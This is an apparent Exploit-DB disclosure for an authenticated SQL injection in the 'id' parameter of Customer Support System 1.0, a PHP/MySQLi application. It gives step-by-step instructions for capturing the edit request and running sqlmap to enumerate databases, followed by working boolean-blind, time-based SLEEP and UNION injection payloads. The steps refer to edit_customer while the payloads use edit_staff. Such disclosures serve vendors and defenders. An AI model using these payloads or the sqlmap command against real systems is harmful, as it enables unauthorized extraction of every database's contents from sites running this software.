Customer Support System 1.0 – ‘id’ SQL Injection

  • 作者: Saeed Bala Ahmed
    日期: 2020-12-17
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49276/
  • # Exploit Title: Customer Support System 1.0 - 'id' SQL Injection
    # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
    # Date: 2020-12-11
    # Google Dork: N/A
    # Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
    # Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
    # Affected Version: Version 1
    # Patched Version: Unpatched
    # Category: Web Application
    # Tested on: Parrot OS
    
    Step 1. Login to the application with admin credentials
    
    Step 2. Click on Customer and select list.
    
    Step 3. On Customer list page, click on action and select edit. Capture the request made to "http://localhost/index.php?page=edit_customer&id=2" in burpsuite
    
    Step 4. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ".
    
    Step 5. This will inject successfully and you will have an information disclosure of all databases contents.
    
    ---
    Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=edit_staff&id=1 AND 4164=4164
    
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=edit_staff&id=1 AND (SELECT 9430 FROM (SELECT(SLEEP(5)))HIyV)
    
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: page=edit_staff&id=-8018 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a716a71,0x497a58666d50656449704b4d76784f43577748416175666f44685869774177416f454c546458536d,0x717a7a6a71),NULL,NULL,NULL,NULL,NULL-- -
    ---